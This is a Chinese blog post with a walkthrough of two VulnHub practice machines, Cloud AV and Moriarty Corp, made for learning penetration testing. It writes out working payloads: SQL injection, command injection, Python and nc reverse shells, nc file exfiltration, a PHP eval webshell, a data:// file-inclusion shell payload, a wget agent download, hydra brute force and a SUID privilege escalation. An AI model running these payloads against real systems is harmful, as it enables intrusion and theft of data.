<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="明 尘">
    
    
    
    
    
    
    <title>easy_cloudantivirus和MoriartyCory | 文心雕龙</title>
    <link href="http://example.com" rel="prefetch" />

    
<link rel="stylesheet" href="/css/bootstrap.min.css">
<link rel="stylesheet" href="/css/aos.css">
<link rel="stylesheet" href="/css/style.css">

    
<script src="/js/jquery.min.js"></script>

    
<script src="/js/bootstrap.min.js"></script>

    
<script src="/js/aos.js"></script>

    
<script src="/js/highslide/highslide-full.min.js"></script>

    
<link rel="stylesheet" href="/js/highslide/highslide.css">

    <style type="text/css">
        @media (max-width: 768px) {
            body {
                background-color: #f0f0f0;
                background: url('/imgs/xsbg.gif');
                background-attachment: fixed;
            }
        }
    </style>
    
    <!--<script type="text/javascript">
      if (document.images) {
        var avatar = new Image();
        avatar.src = '/imgs/avatar.jpg'
        var previews = 'preview1.jpg,preview2.jpg,preview3.jpg,preview4.jpg,preview5.jpg,preview6.jpg,preview7.jpg'.split(',')
        var previewsPreLoad = []
        for(var i = 0; i < length; i++) {
          previewsPreLoad.push(new Image())
          previewsPreLoad[previewsPreLoad.length - 1].src = '/imgs/preview' + previews[i]
        }
      }
    </script>-->
<meta name="generator" content="Hexo 7.0.0"></head>
<body>
    <!-- 背景轮播图功能 -->
    <section class="hidden-xs">
    <ul class="cb-slideshow">
        <li><span>天若</span></li>
        <li><span>有情</span></li>
        <li><span>天亦老</span></li>
        <li><span>我为</span></li>
        <li><span>长者</span></li>
        <li><span>续一秒</span></li>
    </ul>
</section>
    <!-- 欧尼酱功能, 谁用谁知道 -->
    
    <header class="navbar navbar-inverse" id="gal-header">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target=".bs-navbar-collapse"
                    aria-expanded="false">
                <span class="fa fa-lg fa-reorder"></span>
            </button>
            <a href="http://example.com">
                
                <style>
                    #gal-header .navbar-brand {
                        height: 54px;
                        line-height: 24px;
                        font-size: 28px;
                        opacity: 1;
                        background-color: rgba(0,0,0,0);
                        text-shadow: 0 0 5px #fff,0 0 10px #fff,0 0 15px #fff,0 0 20px #228DFF,0 0 35px #228DFF,0 0 40px #228DFF,0 0 50px #228DFF,0 0 75px #228DFF;
                    }
                </style>
                <!-- 这里使用文字(navbar_text or config.title) -->
                <div class="navbar-brand">文心雕龙</div>
                
            </a>
        </div>
        <div class="collapse navbar-collapse bs-navbar-collapse">
            <ul class="nav navbar-nav" id="menu-gal">
                
                
                <li class="">
                    <a href="/">
                        <i class="fa fa-home"></i>首页
                    </a>
                </li>
                
                
                
                <li class="">
                    <a href="/archives">
                        <i class="fa fa-archive"></i>归档
                    </a>
                </li>
                
                
                
                
                <li class="dropdown">
                    <!-- TODO 添加hover dropdown效果 -->
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                       aria-haspopup="true" aria-expanded="false" data-hover="dropdown">
                        <i class="fa fa-list"></i>分类
                    </a>
                    <ul class="dropdown-menu">
                        
                        
                        <li>
                            <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                        </li>
                        
                        <li>
                            <a href="/categories/web%E5%89%8D%E7%AB%AF/">web前端</a>
                        </li>
                        
                        <li>
                            <a href="/categories/php/">php</a>
                        </li>
                        
                        
                        <li>
                            <a href="/categories">...</a>
                        </li>
                        
                        
                    </ul>
                </li>
                
                
                
                
                
                <li class="dropdown">
                    <!-- TODO 添加hover dropdown效果 -->
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                       aria-haspopup="true" aria-expanded="false" data-hover="dropdown">
                        <i class="fa fa-tags"></i>标签
                    </a>
                    <ul class="dropdown-menu">
                        
                        
                        <li>
                            <a href="/tags/Linux/">Linux</a>
                        </li>
                        
                        <li>
                            <a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">基础知识</a>
                        </li>
                        
                        <li>
                            <a href="/tags/DNS%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90/">DNS域名解析</a>
                        </li>
                        
                        
                        <li>
                            <a href="/tags">...</a>
                        </li>
                        
                        
                    </ul>
                </li>
                
                
                
                
                <li class="">
                    <a href="/about">
                        <i class="fa fa-user"></i>关于我
                    </a>
                </li>
                
                
            </ul>
        </div>
    </div>
</header>
    <div id="gal-body">
        <div class="container">
            <div class="row">
                <div class="col-md-8 gal-right" id="mainstay">
                    
<article class="article well article-body" id="article">
    <div class="breadcrumb">
        <i class="fa fa-home"></i>
        <a href="http://example.com">文心雕龙</a>
        >
        <span>easy_cloudantivirus和MoriartyCory</span>
    </div>
    <!-- 大型设备详细文章 -->
    <div class="hidden-xs">
        <div class="title-article">
            <h1>
                <a href="/2024/01/25/easy-cloudantivirus%E5%92%8CMoriartyCory%20160449/">easy_cloudantivirus和MoriartyCory</a>
            </h1>
        </div>
        <div class="tag-article">
            
            <span class="label label-gal">
                <i class="fa fa-calendar"></i> 2024-01-25
            </span>
            
        </div>
    </div>
    <!-- 小型设备详细文章 -->
    <div class="visible-xs">
        <center>
            <div class="title-article">
                <h4>
                    <a href="/2024/01/25/easy-cloudantivirus%E5%92%8CMoriartyCory%20160449/">easy_cloudantivirus和MoriartyCory</a>
                </h4>
            </div>
            <p>
                <i class="fa fa-calendar"></i> 2024-01-25
            </p>
            <p>
                
                
            </p>
        </center>
    </div>
    <div class="content-article">
        <h2><span id="easy-cloudantivirus">easy-cloudantivirus</span></h2><p>下载地址</p>
<p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/">https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/</a></p>
<p>靶机目标</p>
<p>获取靶机root权限</p>
<h3><span id="详细步骤">详细步骤</span></h3><h3><span id="一-主机发现">一、主机发现</span></h3><p>ifconfig<br>ifdown<br>ifup<br>arp-scan -l -I eth0</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240125211109109.png" alt="image-20240125211109109"></p>
<p>nmap -p- 192.168.56.105    </p>
<p>nmap -p 22,8080 -sV 192.168.56.105</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240125211323594.png" alt="image-20240125211323594"></p>
<p>dirsearch -u “<a target="_blank" rel="noopener" href="http://192.168.56.105:8080/">http://192.168.56.105:8080</a>“ -x 403,404,401</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240125211340669.png" alt="image-20240125211340669"></p>
<h3><span id="二-web信息收集">二、Web信息收集</span></h3><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240125211433673.png" alt="image-20240125211433673"></p>
<p><strong>攻击思路：1、SQL注入；2、暴力破解（密码为</strong><code>**password**</code><strong>）</strong></p>
<p>有输入框，尝试用SQL注入，经过实验发现输入”可使程序报错，且爆出如下内容</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126102642200.png" alt="image-20240126102642200"></p>
<h3><span id="sql注入">SQL注入</span></h3><p>继续尝试SQL注入语句，构造攻击代码</p>
<p>“or 1&#x3D;1– -</p>
<p>发现登录到后台</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126104121438.png" alt="image-20240126104121438"></p>
<h3><span id="命令注入nc串联">命令注入（nc串联）</span></h3><ol>
<li><p>测试是否存在注入漏洞</p>
<p>hello|id</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126104723295.png" alt="image-20240126104723295"></p>
</li>
</ol>
<p>cat</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126104951359.png" alt="image-20240126104951359"></p>
<p>前面输入xx,中间用；或者|，后面执行命令。</p>
<p>cat|id        cat;whoami              </p>
<p>cat|which nc 发现存在nc   &#x2F;bin&#x2F;nc</p>
<p>可以用nc反弹shell</p>
<p>反弹Shell</p>
<p>方法一：使用Python反弹Webshell</p>
<p>python|python -c ‘import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.56.102”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;subprocess.call([“&#x2F;bin&#x2F;sh”,”-i”]);’</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126113803063.png" alt="image-20240126113803063"></p>
<p>python -c ‘import pty; pty.spawn(“&#x2F;bin&#x2F;bash”)’<br>stty raw -echo;fg;reset</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126160731045.png" alt="image-20240126160731045"></p>
<p>方法二：如果受害主机存在nc指令，可以使用nc反弹shell</p>
<p>hello | which nc</p>
<p>Kali主机启动监听5555端口</p>
<p>nc -nvlp 5555</p>
<p>靶机</p>
<p>nc  192.168.56.102 5555 -e &#x2F;bin&#x2F;sh #有的Linux发行版有nc命令，但没有-e参数，可以使用如下方法</p>
<p>或者</p>
<p>python|nc 192.168.56.102 5555 | &#x2F;bin&#x2F;sh | nc 192.168.56.102 6666 #nc串联</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126150150439.png" alt="image-20240126150150439"></p>
<p>cat app.py<br>file database.sql</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126150108407.png" alt="image-20240126150108407"></p>
<ul>
<li><p>经分析<code>database.sql</code>是sqlit数据库文件，是Web应用的数据库文件</p>
</li>
<li><p>通过NC传输<code>database.sql</code>文件到kali主机，再查看数据内容</p>
</li>
<li><ul>
<li><p>启动kali主机nc监听</p>
<p>输入python|nc 192.168.56.102 7777 &lt; database.sql</p>
</li>
</ul>
</li>
</ul>
<p>结束5555终端，输入nc -lnvp 7777 &gt; db.sql</p>
<p>稍等一会后，使用<code>Ctrl+C</code>结束监听7777端口的终端</p>
<p>ls 查看db.sql已经在Kali主机上了</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126151307655.png" alt="image-20240126151307655"></p>
<p>用sqlite数据库打开db.sql文件，获取密码</p>
<p>sqlite3<br>.open db.sql<br>.database<br>.dump</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126151611325.png" alt="image-20240126151611325"></p>
<p>明文密码：myinvitecode123<br>mysecondinvitecode<br>cloudavtech<br>mostsecurescanner</p>
<ul>
<li><p>查看系统拥有Shell权限的用户</p>
<p>cat &#x2F;etc&#x2F;passwd | grep &#x2F;bin&#x2F;bash</p>
</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126152212089.png" alt="image-20240126152212089"></p>
<p>系统用户名名单：</p>
<p>root<br>cloudav<br>scanner</p>
<h3><span id="ssh密码爆破尝试失败">SSH密码爆破（尝试失败）</span></h3><p>vi user.txt<br>vi passwd.txt<br>hydra -L user.txt -P passwd.txt ssh:&#x2F;&#x2F;192.168.56.105</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126152735878.png" alt="image-20240126152735878"></p>
<h3><span id="再次系统信息收集发现具有sid权限的文件">再次系统信息收集（发现具有sid权限的文件）</span></h3><p>ls -l &#x2F;home&#x2F;scanner</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126153842636.png" alt="image-20240126153842636"></p>
<p>分析上图得知：<code>update_cloudav.c</code>可能为<code>update_cloudav</code>的源码，且<code>update_cloudav</code>具有sid权限，且属主为root</p>
<h3><span id="代码审计">代码审计</span></h3><p>通过对<code>update_cloudav.c</code>的源码进行审计，发现运行<code>update_cloudav</code>在运行云查杀的时候一定要带参数。由此可以设想携带我们需要命令来实现root身份反弹shell。</p>
<h3><span id="nc串联-本地提权">NC串联、本地提权</span></h3><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126161301433.png" alt="image-20240126161301433"></p>
<p>.&#x2F;update_cloudav “a|nc 192.168.56.102 7777 | &#x2F;bin&#x2F;sh | nc 192.168.56.102 8888”</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126161213197.png" alt="image-20240126161213197"></p>
<h2><span id="moriartycory">MoriartyCory</span></h2><h3><span id="下载地址">下载地址</span></h3><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/">https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/</a></p>
<p>获取6个Flag</p>
<h3><span id="工具准备">工具准备</span></h3><ul>
<li><p>Venom：<a target="_blank" rel="noopener" href="https://github.com/Dliv3/Venom/">https://github.com/Dliv3/Venom/</a></p>
</li>
<li><p>蚁剑源代码：<a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/antSword">https://github.com/AntSwordProject</a></p>
</li>
<li><p>蚁剑加载器：<a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/AntSword-Loader">https://github.com/AntSwordProject/AntSword-Loader</a></p>
</li>
<li><p>PHP一句话木马：<code>&lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt;</code></p>
</li>
<li><p>在线密码破解平台：</p>
</li>
<li><ul>
<li><a target="_blank" rel="noopener" href="https://cmd5.com/">https://cmd5.com/</a></li>
<li><a target="_blank" rel="noopener" href="https://md5.gromweb.com/">https://md5.gromweb.com/</a></li>
</ul>
</li>
</ul>
<h3><span id="一-主机发现">一、主机发现</span></h3><p>arp-scan -l -I eth0</p>
<p>nmap -p- 192.168.56.106  </p>
<p>nmap -p 22,8000,9000 -sV 192.168.56.106</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126100820769.png" alt="image-20240126100820769"></p>
<h3><span id="flag0">Flag0</span></h3><ol>
<li>浏览器访问<code>http://192.168.56.106:8000</code>，获取flag0</li>
</ol>
<h3><span id="flag1">Flag1</span></h3><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240126230847943.png" alt="image-20240126230847943"></p>
<p>根据提示：目标靶机开放在80端口</p>
<p>端口扫描</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240127181857803.png" alt="image-20240127181857803"></p>
<p>浏览器访问<a target="_blank" rel="noopener" href="http://192.168.56.106/">http://192.168.56.106</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240127182241432.png" alt="image-20240127182241432"></p>
<p>通过点击显示的两个链接发现存在<strong>文件包含</strong></p>
<p>确认存在文件包含漏洞</p>
<p><a target="_blank" rel="noopener" href="http://192.168.56.106/?file=../../../../etc/passwd">http://192.168.56.106/?file=../../../../etc/passwd</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240127182447252.png" alt="image-20240127182447252"></p>
<p>利用文件包含漏洞反弹Shell，</p>
<ul>
<li>Kali主机启动nc监听</li>
</ul>
<p>nc -lnvp 5555</p>
<ul>
<li><p>文件包含反弹Shell，注意设置反弹地址和端口</p>
</li>
<li><ul>
<li><p>代码一：明文版</p>
<p><a target="_blank" rel="noopener" href="http://192.168.56.106/?file=data://text/plain">http://192.168.56.106/?file=data://text/plain</a>,<?php $a=$_GET["abc"];exec($a);echo $a;?>&amp;abc&#x3D;rm+&#x2F;tmp&#x2F;f;mkfifo+&#x2F;tmp&#x2F;f;cat+&#x2F;tmp&#x2F;f|&#x2F;bin&#x2F;sh+-i+2&gt;%261|nc+192.168.56.102+5555+&gt;&#x2F;tmp&#x2F;f</p>
</li>
<li><p>代码二：Base64加密版</p>
<p><a target="_blank" rel="noopener" href="http://192.168.56.106/?file=data://text/plain;base64,PD9waHAgJGE9JF9HRVRbImFiYyJdO2V4ZWMoJGEpO2VjaG8gJGE7Pz4=&abc=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f%7C/bin/sh+-i+2%3E&1%7Cnc+192.168.56.102+5555+%3E/tmp/f">http://192.168.56.106/?file=data://text/plain;base64,PD9waHAgJGE9JF9HRVRbImFiYyJdO2V4ZWMoJGEpO2VjaG8gJGE7Pz4=&amp;abc=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2&gt;%261|nc+192.168.56.102+5555+&gt;/tmp/f</a></p>
</li>
</ul>
</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240127202253560.png" alt="image-20240127202253560"></p>
<p>获取flag1</p>
<p>cd &#x2F;</p>
<p>ls</p>
<p>cat 1_flag.txt</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240127202355390.png" alt="image-20240127202355390"></p>
<ol>
<li>到<a href="http://192.168.56.106:8000提交flag">http://192.168.56.106:8000提交flag</a>    flag{the_game_is_on}</li>
</ol>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240127224846085.png" alt="image-20240127224846085"></p>
<h3><span id="flag2">Flag2</span></h3><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128092401486.png" alt="image-20240128092401486"></p>
<p>根据提示，目标靶机在内网172.17.0.3-254上</p>
<ul>
<li><p>使用Venom建立通信隧道</p>
</li>
<li><ul>
<li>启动Venom服务端</li>
</ul>
</li>
</ul>
<p><code>chmod +x admin_linux_x64</code><br><code>./admin_linux_x64 -lport 9999</code></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128092954249.png" alt="image-20240128092954249"></p>
<ul>
<li><ul>
<li>在Venom目录启动http server</li>
</ul>
</li>
</ul>
<p>python3 -m http.server 80</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128093208948.png" alt="image-20240128093208948"></p>
<ul>
<li><ul>
<li>在靶机获取Venom客户端</li>
</ul>
</li>
</ul>
<p>cd &#x2F;tmp<br>wget -c <a target="_blank" rel="noopener" href="http://192.168.56.102/agent_linux_x64">http://192.168.56.102/agent_linux_x64</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128093440128.png" alt="image-20240128093440128"></p>
<ul>
<li><ul>
<li>执行Venom客户端程序</li>
</ul>
</li>
</ul>
<p>chmod +x agent_linux_x64<br>.&#x2F;agent_linux_x64 -rhost 192.168.56.102 -rport 9999</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128093633195.png" alt="image-20240128093633195"></p>
<p>Venom服务端可以看到有节点上线，开启Kali本地socks侦听端口</p>
<p>show<br>goto 1<br>socks 1080</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128093819664.png" alt="image-20240128093819664"></p>
<ul>
<li><p>Kali挂Proxychains扫描内网</p>
</li>
<li><ul>
<li>修改Proxychains配置文件</li>
</ul>
</li>
</ul>
<p>sudo vi &#x2F;etc&#x2F;proxychains4.conf<br>修改最后一行配置文件为：<br>socks5  127.0.0.1 1080</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128094313800.png" alt="image-20240128094313800"></p>
<ul>
<li><ul>
<li>扫描内网目标IP地址段</li>
</ul>
</li>
</ul>
<p>proxychains nmap -p80,22,443 172.17.0.3-254</p>
<p>发现172.17.0.4主机80端口在线</p>
<ul>
<li>浏览器配置代理访问172.17.0.4的页面</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128100525791.png" alt="image-20240128100525791"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128100550300.png" alt="image-20240128100550300"></p>
<p>通过页面观察，如需上传文件就要输入密码</p>
<ul>
<li><p>Burpsuite爆破上传密码</p>
</li>
<li><ul>
<li>启动Burpsuite设置上级代理</li>
</ul>
</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128100957684.png" alt="image-20240128100957684"></p>
<ul>
<li><ul>
<li>启动Burp自带浏览器，打开172.17.0.4的页面</li>
<li>开启http拦截，选择上传shell文件，随便输入上传密码，点击上传</li>
</ul>
</li>
<li><ul>
<li>发送到Intruder</li>
<li>设置只爆破密码</li>
</ul>
</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128102433777.png" alt="image-20240128102433777"></p>
<ul>
<li><ul>
<li>设置Payloads字典，开始攻击</li>
</ul>
</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128102741324.png" alt="image-20240128102741324"></p>
<p>通过测试，发现密码为password</p>
<ul>
<li>通过输入正确的密码<code>password</code>显示上传成功</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128103258167.png" alt="image-20240128103258167"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128104247690.png" alt="image-20240128104247690"></p>
<p>获取Webshell地址</p>
<p><a target="_blank" rel="noopener" href="http://172.17.0.4/photo/24/shell.php">http://172.17.0.4/photo/24/shell.php</a></p>
<p>设置蚁剑连接shell</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128104937788.png" alt="image-20240128104937788"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128111401934.png" alt="image-20240128111401934"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128111254165.png" alt="image-20240128111254165"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128111554982.png" alt="image-20240128111554982"></p>
<p>发现flag</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128111640408.png" alt="image-20240128111640408"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128111709234.png" alt="image-20240128111709234"></p>
<p>提交flag{picture_is_worth_1000_words}</p>
<h3><span id="flag4">flag4</span></h3><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128111929621.png" alt="image-20240128111929621"></p>
<p>根据提示：内网存在ssh服务，且用户名和MD5密码如下：</p>
<p>用户名：</p>
<p>root</p>
<p>toor</p>
<p>admin</p>
<p>mcorp</p>
<p>moriarty</p>
<p>密码：</p>
<p>63a9f0ea7bb98050796b649e85481845</p>
<p>7b24afc8bc80e548d66c4e7ff72171c5</p>
<p>5f4dcc3b5aa765d61d8327deb882cf99</p>
<p>21232f297a57a5a743894a0e4a801fc3</p>
<p>084e0343a0486ff05530df6c705c8bb4</p>
<p>697c6cc76fdbde5baccb7b3400391e30</p>
<p>8839cfc8a0f24eb155ae3f7f205f5cbc</p>
<p>35ac704fe1cc7807c914af478f20fd35</p>
<p>b27a803ed346fbbf6d2e2eb88df1c51b</p>
<p>08552d48aa6d6d9c05dd67f1b4ba8747</p>
<ul>
<li>扫描内网开启22端口的主机</li>
</ul>
<p>proxychains nmap -p22 -sT -Pn 172.17.0.3-254</p>
<p>发现目标靶机为内网172.17.0.5:22</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128112429894.png" alt="image-20240128112429894"></p>
<ul>
<li>通过在线密码查询平台查询密码明文：</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128113028781.png" alt="image-20240128113028781"></p>
<table>
<thead>
<tr>
<th>63a9f0ea7bb98050796b649e85481845</th>
<th>root</th>
</tr>
</thead>
<tbody><tr>
<td>7b24afc8bc80e548d66c4e7ff72171c5</td>
<td>toor</td>
</tr>
<tr>
<td>5f4dcc3b5aa765d61d8327deb882cf99</td>
<td>password</td>
</tr>
<tr>
<td>21232f297a57a5a743894a0e4a801fc3</td>
<td>admin</td>
</tr>
<tr>
<td>084e0343a0486ff05530df6c705c8bb4</td>
<td>guest</td>
</tr>
<tr>
<td>697c6cc76fdbde5baccb7b3400391e30</td>
<td>MORIARTY</td>
</tr>
<tr>
<td>8839cfc8a0f24eb155ae3f7f205f5cbc</td>
<td>MCORP</td>
</tr>
<tr>
<td>35ac704fe1cc7807c914af478f20fd35</td>
<td>mcorp</td>
</tr>
<tr>
<td>b27a803ed346fbbf6d2e2eb88df1c51b</td>
<td>weapons</td>
</tr>
<tr>
<td>08552d48aa6d6d9c05dd67f1b4ba8747</td>
<td>moriarty</td>
</tr>
</tbody></table>
<ul>
<li>写入用户名到user.txt</li>
</ul>
<p>vi user.txt</p>
<ul>
<li>写入密码明文到pass.txt</li>
</ul>
<p>vi pass.txt</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128121146513.png" alt="image-20240128121146513"></p>
<ul>
<li>使用hydra暴力破解ssh</li>
</ul>
<p>proxychains hydra -L user.txt -P pass.txt ssh:&#x2F;&#x2F;172.17.0.5</p>
<p>得知<code>root</code>密码为<code>weapons</code></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128121307244.png" alt="image-20240128121307244"></p>
<ul>
<li>使用ssh登录目标靶机</li>
</ul>
<p>proxychains ssh <a href="mailto:&#x72;&#x6f;&#111;&#116;&#64;&#x31;&#x37;&#x32;&#46;&#x31;&#x37;&#x2e;&#x30;&#46;&#53;">&#x72;&#x6f;&#111;&#116;&#64;&#x31;&#x37;&#x32;&#46;&#x31;&#x37;&#x2e;&#x30;&#46;&#53;</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128121521364.png" alt="image-20240128121521364"></p>
<ul>
<li><p>获取Flag3，<code>flag&#123;what_weapons&#125;</code></p>
<p>cd &#x2F;</p>
<p>ls</p>
<p>cat &#x2F;3_flag.txt</p>
</li>
</ul>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128141039057.png" alt="image-20240128141039057"></p>
<p>提交flag{what_weapons}</p>
<h3><span id="flag5">flag5</span></h3><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128141419181.png" alt="image-20240128141419181"></p>
<p>根据提示：目标靶机可能在443,8000,8080,8888.端口上，目标账号密码是<code>buyer13</code>:<code>arms13</code></p>
<ul>
<li>端口扫描</li>
</ul>
<p>经扫描得知，目标主机为172.17.0.6:8000 http服务</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128142448719.png" alt="image-20240128142448719"></p>
<p>打开<a target="_blank" rel="noopener" href="http://172.17.0.6:8000/">http://172.17.0.6:8000/</a>     输入用户名和密码，</p>
<p>Here are the credentials our agent has obtained from another source:<br>username: buyer13<br>password: arms13</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128145310048.png" alt="image-20240128145310048"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128145422186.png" alt="image-20240128145422186"></p>
<p>点击<code>Chats</code>按钮</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128145806529.png" alt="image-20240128145806529"></p>
<p>通过聊天信息了解到管理员账户为<code>admin</code></p>
<p>点击Change Password</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128150141328.png" alt="image-20240128150141328"></p>
<p>用burp抓包，</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128150307764.png" alt="image-20240128150307764"></p>
<p>将用户名buyer13修改为admin</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128150411649.png" alt="image-20240128150411649"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128154851166.png" alt="image-20240128154851166"></p>
<p>点击<code>Chats</code>按钮，获取Flag4，为<code>flag&#123;on_the_move&#125;</code></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128154914511.png" alt="image-20240128154914511"></p>
<h3><span id="flag6">flag6</span></h3><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128155102401.png" alt="image-20240128155102401"></p>
<p>根据信息：内网存在Elasticsearch服务（工作在TCP9200端口）</p>
<ul>
<li>端口扫描</li>
</ul>
<p>proxychains nmap -p9200 -sT -Pn 172.17.0.3-254</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128155229128.png" alt="image-20240128155229128"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128155328576.png" alt="image-20240128155328576"></p>
<p>老Elasticsearch软件版本存在很多漏洞，搜索可利用攻击脚本</p>
<p>searchsploit Elasticsearch</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128155421036.png" alt="image-20240128155421036"></p>
<p>尝试36337.py脚本</p>
<p>cp &#x2F;usr&#x2F;share&#x2F;exploitdb&#x2F;exploits&#x2F;linux&#x2F;remote&#x2F;36337.py .</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128155852366.png" alt="image-20240128155852366"></p>
<p>查看36337.py脚本得知，使用python2作为解析器，为了能让36337脚本能正常执行，先要写入一条数据</p>
<p>proxychains curl -XPOST ‘172.17.0.8:9200&#x2F;twitter&#x2F;user&#x2F;yren’ -d ‘{“name”:”Wu”}’</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128155925584.png" alt="image-20240128155925584"></p>
<p>执行攻击脚本</p>
<p>proxychains python2 36337.py 172.17.0.8</p>
